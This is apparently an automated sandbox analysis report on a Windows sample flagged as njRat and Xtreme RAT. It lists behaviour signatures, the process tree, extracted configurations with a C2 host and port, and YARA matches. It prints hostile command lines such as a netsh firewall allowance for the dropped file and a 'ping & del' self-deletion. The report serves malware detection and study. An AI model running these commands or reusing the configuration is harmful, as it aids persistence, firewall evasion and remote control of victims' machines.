Play interactive tour

Edit tour

Windows Analysis Report 7FW4ce2RDy

Overview

General Information

Sample Name:	7FW4ce2RDy (renamed file extension from none to exe)
Analysis ID:	494416
MD5:	776211eed31b6a8ea3539ac1d822362c
SHA1:	b18225f3217536c802d43d9e4a0ac8ac22a90109
SHA256:	f32fb1af5db650065e6e1d02ade5506e6c0903e4bbc9ff6ff2fbf94bef6ffba4
Tags:	exeXtrat
Infos:
Most interesting Screenshot:

Detection

njRat Xtreme RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Xtreme RAT

Antivirus detection for dropped file

Sigma detected: Suspect Svchost Activity

Found malware configuration

Multi AV Scanner detection for submitted file

Detected njRat

Malicious sample detected (through community Yara rule)

Yara detected Njrat

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Uses netsh to modify the Windows network and firewall settings

Drops PE files to the startup folder

Machine Learning detection for sample

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Sigma detected: Suspicious Svchost Process

Installs Xtreme RAT

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Creates autostart registry keys with suspicious names

Drops executables to the windows directory (C:\Windows) and starts them

Uses dynamic DNS services

Writes to foreign memory regions

Protects its processes via BreakOnTermination flag

.NET source code references suspicious native API functions

Contains functionality to log keystrokes (.Net Source)

Contains functionality to register a low level keyboard hook

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Modifies the windows firewall

Contains functionality to inject threads in other processes

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file contains strange resources

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Creates a start menu entry (Start Menu\Programs\Startup)

Sigma detected: Netsh Port or Application Allowed

Contains functionality to retrieve information about pressed keystrokes

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Creates files inside the system directory

May infect USB drives

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Contains functionality to call native functions

Contains functionality to read the clipboard data

Contains functionality to upload files via FTP

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Potential key logger detected (key state polling based)

Classification

Process Tree

System is w10x64

7FW4ce2RDy.exe (PID: 6908 cmdline: 'C:\Users\user\Desktop\7FW4ce2RDy.exe' MD5: 776211EED31B6A8EA3539AC1D822362C)

svchost.exe (PID: 3652 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

WerFault.exe (PID: 6460 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 564 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 2992 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 512 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

chrome.exe (PID: 5608 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe MD5: C139654B5C1438A95B321BB01AD63EF6)

562Server.exe (PID: 4472 cmdline: 'C:\Windows\system32\562Server.exe' MD5: B207157C9F171556BF4D240C14AABA0E)

System.exe (PID: 5712 cmdline: 'C:\Users\user\AppData\Local\Temp\System.exe' MD5: B207157C9F171556BF4D240C14AABA0E)

netsh.exe (PID: 6764 cmdline: netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 3156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

System.exe (PID: 6552 cmdline: 'C:\Users\user\AppData\Local\Temp\System.exe' .. MD5: B207157C9F171556BF4D240C14AABA0E)

System.exe (PID: 3156 cmdline: 'C:\Users\user\AppData\Local\Temp\System.exe' .. MD5: B207157C9F171556BF4D240C14AABA0E)

System.exe (PID: 6872 cmdline: 'C:\Users\user\AppData\Local\Temp\System.exe' .. MD5: B207157C9F171556BF4D240C14AABA0E)

cleanup

Malware Configuration

Threatname: Njrat

{"Campaign ID": "HacKed", "Version": "0.6.4", "Install Name": "System.exe", "Install Dir": "TEMP", "Registry Value": "301b5fcf8ce2fab8868e80b6c1f912fe", "Host": "windownssystem.ddns.net", "Port": "1010", "Network Seprator": "|'|'|"}

Threatname: Xtreme RAT

{"id": "MuAwaY", "group": "MuAwaY", "version": "T2.9", "mutex": "HgDdsuTd", "installdir": "MuAwaYOriginal", "installdirfile": "MuAwaY.exe", "ftp server": "ftp.ftpserver.com"}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
7FW4ce2RDy.exe	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>	0x45d8:$a: XTREME 0x9db8:$a: XTREME 0xab70:$a: XTREME 0x46b20:$a: XTREME 0x46b2e:$a: XTREME 0x54320:$a: XTREME 0x5432e:$a: XTREME 0xbd74:$b: ServerStarted 0x89f0:$c: XtremeKeylogger 0x470c:$d: x.html 0x854a:$e: Xtreme RAT
7FW4ce2RDy.exe	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth	0x5dcd:$x1: ServerKeyloggerU 0x490b9:$x2: TServerKeylogger 0x89f0:$x3: XtremeKeylogger 0xab70:$x4: XTREMEBINDER 0x46b2e:$x4: XTREMEBINDER 0x5432e:$x4: XTREMEBINDER 0xa850:$s1: shellexecute= 0x6d4c:$s2: [Execute] 0xa796:$s3: ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
7FW4ce2RDy.exe	JoeSecurity_XtremeRat	Yara detected Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
7FW4ce2RDy.exe	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x45d8:$a: XTREME 0x9db8:$a: XTREME 0xab70:$a: XTREME 0x46b20:$a: XTREME 0x46b2e:$a: XTREME 0x54320:$a: XTREME 0x5432e:$a: XTREME 0xab70:$b: XTREMEBINDER 0x46b2e:$b: XTREMEBINDER 0x5432e:$b: XTREMEBINDER 0x9dcc:$c: STARTSERVERBUFFER 0xcbb4:$d: SOFTWARE\XtremeRAT 0x89f0:$f: XtremeKeylogger 0x854a:$h: Xtreme RAT

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x61dc:$s2: netsh firewall add allowedprogram 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x6124:$s4: yyyy-MM-dd 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
C:\Windows\SysWOW64\562Server.exe	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x61dc:$s2: netsh firewall add allowedprogram 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x6124:$s4: yyyy-MM-dd 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
C:\Windows\SysWOW64\562Server.exe	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
C:\Windows\SysWOW64\562Server.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x61dc:$a1: netsh firewall add allowedprogram 0x61ac:$a2: SEE_MASK_NOZONECHECKS 0x6598:$b1: [TAP] 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x64ec:$c3: cmd.exe /c ping
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x61dc:$a1: netsh firewall add allowedprogram 0x61ac:$a2: SEE_MASK_NOZONECHECKS 0x6598:$b1: [TAP] 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x64ec:$c3: cmd.exe /c ping
C:\Users\user\AppData\Local\Temp\System.exe	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x61dc:$s2: netsh firewall add allowedprogram 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x6124:$s4: yyyy-MM-dd 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
C:\Users\user\AppData\Local\Temp\System.exe	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
C:\Users\user\AppData\Local\Temp\System.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x61dc:$a1: netsh firewall add allowedprogram 0x61ac:$a2: SEE_MASK_NOZONECHECKS 0x6598:$b1: [TAP] 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x64ec:$c3: cmd.exe /c ping
Click to see the 4 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5df0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x5fdc:$s2: netsh firewall add allowedprogram 0x5e16:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x5f24:$s4: yyyy-MM-dd 0x62ec:$v2: cmd.exe /c ping 127.0.0.1 & del
00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x5fdc:$a1: netsh firewall add allowedprogram 0x5fac:$a2: SEE_MASK_NOZONECHECKS 0x6398:$b1: [TAP] 0x62ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x62ec:$c3: cmd.exe /c ping
00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5df0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x5fdc:$s2: netsh firewall add allowedprogram 0x5e16:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x5f24:$s4: yyyy-MM-dd 0x62ec:$v2: cmd.exe /c ping 127.0.0.1 & del
00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x5fdc:$a1: netsh firewall add allowedprogram 0x5fac:$a2: SEE_MASK_NOZONECHECKS 0x6398:$b1: [TAP] 0x62ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x62ec:$c3: cmd.exe /c ping
00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x320:$a: XTREME 0x32e:$a: XTREME 0x32e:$b: XTREMEBINDER
00000000.00000000.291223895.0000000010056000.00000008.00020000.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x320:$a: XTREME 0x32e:$a: XTREME 0x32e:$b: XTREMEBINDER
00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5df0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x5fdc:$s2: netsh firewall add allowedprogram 0x5e16:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x5f24:$s4: yyyy-MM-dd 0x62ec:$v2: cmd.exe /c ping 127.0.0.1 & del
00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x5fdc:$a1: netsh firewall add allowedprogram 0x5fac:$a2: SEE_MASK_NOZONECHECKS 0x6398:$b1: [TAP] 0x62ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x62ec:$c3: cmd.exe /c ping
00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>	0x41d8:$a: XTREME 0x99b8:$a: XTREME 0xa770:$a: XTREME 0xb974:$b: ServerStarted 0x85f0:$c: XtremeKeylogger 0x430c:$d: x.html 0x814a:$e: Xtreme RAT
00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp	JoeSecurity_XtremeRat	Yara detected Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x41d8:$a: XTREME 0x99b8:$a: XTREME 0xa770:$a: XTREME 0xa770:$b: XTREMEBINDER 0x99cc:$c: STARTSERVERBUFFER 0xc7b4:$d: SOFTWARE\XtremeRAT 0x85f0:$f: XtremeKeylogger 0x814a:$h: Xtreme RAT
00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5df0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x5fdc:$s2: netsh firewall add allowedprogram 0x5e16:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x5f24:$s4: yyyy-MM-dd 0x62ec:$v2: cmd.exe /c ping 127.0.0.1 & del
00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x5fdc:$a1: netsh firewall add allowedprogram 0x5fac:$a2: SEE_MASK_NOZONECHECKS 0x6398:$b1: [TAP] 0x62ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x62ec:$c3: cmd.exe /c ping
00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5df0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x5fdc:$s2: netsh firewall add allowedprogram 0x5e16:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x5f24:$s4: yyyy-MM-dd 0x62ec:$v2: cmd.exe /c ping 127.0.0.1 & del
00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x5fdc:$a1: netsh firewall add allowedprogram 0x5fac:$a2: SEE_MASK_NOZONECHECKS 0x6398:$b1: [TAP] 0x62ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x62ec:$c3: cmd.exe /c ping
00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5774:$s1: 7C 00 27 00 7C 00 27 00 7C 0xcb8c:$s1: 7C 00 27 00 7C 00 27 00 7C 0x5960:$s2: netsh firewall add allowedprogram 0xcd78:$s2: netsh firewall add allowedprogram 0x579a:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0xcbb2:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x58a8:$s4: yyyy-MM-dd 0xccc0:$s4: yyyy-MM-dd 0x5c70:$v2: cmd.exe /c ping 127.0.0.1 & del 0xd088:$v2: cmd.exe /c ping 127.0.0.1 & del
00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x5960:$a1: netsh firewall add allowedprogram 0xcd78:$a1: netsh firewall add allowedprogram 0x5930:$a2: SEE_MASK_NOZONECHECKS 0xcd48:$a2: SEE_MASK_NOZONECHECKS 0x5d1c:$b1: [TAP] 0xd134:$b1: [TAP] 0x5c70:$c2: cmd.exe /c ping 127.0.0.1 & del 0xd088:$c2: cmd.exe /c ping 127.0.0.1 & del 0x5c70:$c3: cmd.exe /c ping 0xd088:$c3: cmd.exe /c ping
00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5df0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x5fdc:$s2: netsh firewall add allowedprogram 0x5e16:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x5f24:$s4: yyyy-MM-dd 0x62ec:$v2: cmd.exe /c ping 127.0.0.1 & del
00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x5fdc:$a1: netsh firewall add allowedprogram 0x5fac:$a2: SEE_MASK_NOZONECHECKS 0x6398:$b1: [TAP] 0x62ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x62ec:$c3: cmd.exe /c ping
00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5df0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x5fdc:$s2: netsh firewall add allowedprogram 0x5e16:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x5f24:$s4: yyyy-MM-dd 0x62ec:$v2: cmd.exe /c ping 127.0.0.1 & del
00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x5fdc:$a1: netsh firewall add allowedprogram 0x5fac:$a2: SEE_MASK_NOZONECHECKS 0x6398:$b1: [TAP] 0x62ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x62ec:$c3: cmd.exe /c ping
00000001.00000002.304153426.0000000010048000.00000040.00000001.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x320:$a: XTREME 0x32e:$a: XTREME 0xe320:$a: XTREME 0xe32e:$a: XTREME 0x32e:$b: XTREMEBINDER 0xe32e:$b: XTREMEBINDER
00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>	0x41d8:$a: XTREME 0x99b8:$a: XTREME 0xa770:$a: XTREME 0xb974:$b: ServerStarted 0x85f0:$c: XtremeKeylogger 0x430c:$d: x.html 0x814a:$e: Xtreme RAT
00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp	JoeSecurity_XtremeRat	Yara detected Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x41d8:$a: XTREME 0x99b8:$a: XTREME 0xa770:$a: XTREME 0xa770:$b: XTREMEBINDER 0x99cc:$c: STARTSERVERBUFFER 0xc7b4:$d: SOFTWARE\XtremeRAT 0x85f0:$f: XtremeKeylogger 0x814a:$h: Xtreme RAT
00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5df0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x5fdc:$s2: netsh firewall add allowedprogram 0x5e16:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x5f24:$s4: yyyy-MM-dd 0x62ec:$v2: cmd.exe /c ping 127.0.0.1 & del
00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x5fdc:$a1: netsh firewall add allowedprogram 0x5fac:$a2: SEE_MASK_NOZONECHECKS 0x6398:$b1: [TAP] 0x62ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x62ec:$c3: cmd.exe /c ping
00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5df0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x5fdc:$s2: netsh firewall add allowedprogram 0x5e16:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x5f24:$s4: yyyy-MM-dd 0x62ec:$v2: cmd.exe /c ping 127.0.0.1 & del
00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x5fdc:$a1: netsh firewall add allowedprogram 0x5fac:$a2: SEE_MASK_NOZONECHECKS 0x6398:$b1: [TAP] 0x62ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x62ec:$c3: cmd.exe /c ping
00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5abc:$s1: 7C 00 27 00 7C 00 27 00 7C 0x5ca8:$s2: netsh firewall add allowedprogram 0x5ae2:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x5bf0:$s4: yyyy-MM-dd 0x5fb8:$v2: cmd.exe /c ping 127.0.0.1 & del
00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x5ca8:$a1: netsh firewall add allowedprogram 0x5c78:$a2: SEE_MASK_NOZONECHECKS 0x6064:$b1: [TAP] 0x5fb8:$c2: cmd.exe /c ping 127.0.0.1 & del 0x5fb8:$c3: cmd.exe /c ping
00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x320:$a: XTREME 0x32e:$a: XTREME 0x32e:$b: XTREMEBINDER
00000001.00000000.293164908.0000000010048000.00000040.00000001.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x320:$a: XTREME 0x32e:$a: XTREME 0xe320:$a: XTREME 0xe32e:$a: XTREME 0x32e:$b: XTREMEBINDER 0xe32e:$b: XTREMEBINDER
00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>	0x51d8:$a: XTREME 0xa9b8:$a: XTREME 0xb770:$a: XTREME 0xc974:$b: ServerStarted 0x95f0:$c: XtremeKeylogger 0x530c:$d: x.html 0x914a:$e: Xtreme RAT
00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth	0x69cd:$x1: ServerKeyloggerU 0x95f0:$x3: XtremeKeylogger 0xb770:$x4: XTREMEBINDER 0xb450:$s1: shellexecute= 0x794c:$s2: [Execute] 0xb396:$s3: ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp	JoeSecurity_XtremeRat	Yara detected Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x51d8:$a: XTREME 0xa9b8:$a: XTREME 0xb770:$a: XTREME 0xb770:$b: XTREMEBINDER 0xa9cc:$c: STARTSERVERBUFFER 0xd7b4:$d: SOFTWARE\XtremeRAT 0x95f0:$f: XtremeKeylogger 0x914a:$h: Xtreme RAT
00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp	RAT_Xtreme	Detects Xtreme RAT	Kevin Breen <kevin@techanarchy.net>	0x51d8:$a: XTREME 0xa9b8:$a: XTREME 0xb770:$a: XTREME 0xc974:$b: ServerStarted 0x95f0:$c: XtremeKeylogger 0x530c:$d: x.html 0x914a:$e: Xtreme RAT
00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp	Xtreme_Sep17_1	Detects XTREME sample analyzed in September 2017	Florian Roth	0x69cd:$x1: ServerKeyloggerU 0x95f0:$x3: XtremeKeylogger 0xb770:$x4: XTREMEBINDER 0xb450:$s1: shellexecute= 0x794c:$s2: [Execute] 0xb396:$s3: ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp	JoeSecurity_XtremeRat	Yara detected Xtreme RAT	Kevin Breen <kevin@techanarchy.net>
00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x51d8:$a: XTREME 0xa9b8:$a: XTREME 0xb770:$a: XTREME 0xb770:$b: XTREMEBINDER 0xa9cc:$c: STARTSERVERBUFFER 0xd7b4:$d: SOFTWARE\XtremeRAT 0x95f0:$f: XtremeKeylogger 0x914a:$h: Xtreme RAT
00000000.00000000.291215045.0000000010048000.00000080.00020000.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x320:$a: XTREME 0x32e:$a: XTREME 0x32e:$b: XTREMEBINDER
00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5df0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x5fdc:$s2: netsh firewall add allowedprogram 0x5e16:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x5f24:$s4: yyyy-MM-dd 0x62ec:$v2: cmd.exe /c ping 127.0.0.1 & del
00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x5fdc:$a1: netsh firewall add allowedprogram 0x5fac:$a2: SEE_MASK_NOZONECHECKS 0x6398:$b1: [TAP] 0x62ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x62ec:$c3: cmd.exe /c ping
00000008.00000002.559691939.00000000029E1000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: 7FW4ce2RDy.exe PID: 6908	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: 562Server.exe PID: 4472	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: System.exe PID: 5712	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: System.exe PID: 6552	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: System.exe PID: 3156	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: System.exe PID: 6872	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Click to see the 58 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.System.exe.3e0000.0.unpack	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x61dc:$s2: netsh firewall add allowedprogram 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x6124:$s4: yyyy-MM-dd 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
8.2.System.exe.3e0000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
8.2.System.exe.3e0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x61dc:$a1: netsh firewall add allowedprogram 0x61ac:$a2: SEE_MASK_NOZONECHECKS 0x6598:$b1: [TAP] 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x64ec:$c3: cmd.exe /c ping
19.0.System.exe.3e0000.0.unpack	RAT_njRat	Detects njRAT	Kevin Breen <kevin@techanarchy.net>	0x5ff0:$s1: 7C 00 27 00 7C 00 27 00 7C 0x61dc:$s2: netsh firewall add allowedprogram 0x6016:$s3: Software\Microsoft\Windows\CurrentVersion\Run 0x6124:$s4: yyyy-MM-dd 0x64ec:$v2: cmd.exe /c ping 127.0.0.1 & del
19.0.System.exe.3e0000.0.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
19.0.System.exe.3e0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x61dc:$a1: netsh firewall add allowedprogram 0x61ac:$a2: SEE_MASK_NOZONECHECKS 0x6598:$b1: [TAP] 0x64ec:$c2: cmd.exe /c ping 127.0.0.1 & del 0x64ec:$c3: cmd.exe /c ping
